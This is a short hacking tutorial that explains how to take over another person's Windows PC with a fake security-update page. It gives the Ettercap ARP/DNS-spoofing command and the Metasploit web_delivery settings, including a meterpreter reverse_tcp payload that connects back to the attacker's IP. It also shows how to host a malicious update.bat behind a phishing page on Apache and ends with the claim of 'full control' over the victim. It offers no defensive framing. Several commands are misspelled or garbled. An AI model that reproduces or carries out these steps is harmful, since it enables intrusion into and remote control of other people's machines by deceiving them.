HACK REMOTE PC USING FAKE UPDATE SCAM

 *In which we use Ettercap and Metasploit

1. First go to kali Linux home directory move to ( etc/ettercap)directory

2. move your original etter.dns file then edit new etter.dns

3. Add your kali ( your pc) IP address as { A*} record . as below example

*A: 192.168.244.129  

4. Save it and run the following command with victim IP to spoof victim pc

# ettercap – i eth0 –T –q -p dns_spoof –M ARP /victim ip.//

It Activate dns_spoof plug –in.

5. Now time to use Metasploit type msfconsole in terminal

6. Now type as following

6.1 use exploit /multi/ script/web_delhivery

6.2 set LHOST { your kali ip}  like= set LHOST 192.168.244.129

6.3 set LPORT 4444

6.4 set target 2

6.5 set payload windows/meterpreter/reverse_tcp

6.6 exploit

As shown in fig

7.Now copy the powershell .exe code and save as update.bat file in var/www/html

8. Create a fake website page showing windows security update message. In webpage give hyperlink as update.bat file.in var/www/html

9.Save this webpage as index.html and paste it in var/www/html

use href= ‘ your kali ip/update.bat

10.Now start apache server to start use command { service apache2 start }

11.When the victim open any webpage this page showing windows security update message will displayed.

*When victim click on download button save batch file batch file automaticallyexecute

12.Now you will get control of victim pc. Now type {session –l } command to display sessions opened when victim open link

You get meterpreter session like this

Please note, by this time you have full control on your victim PC.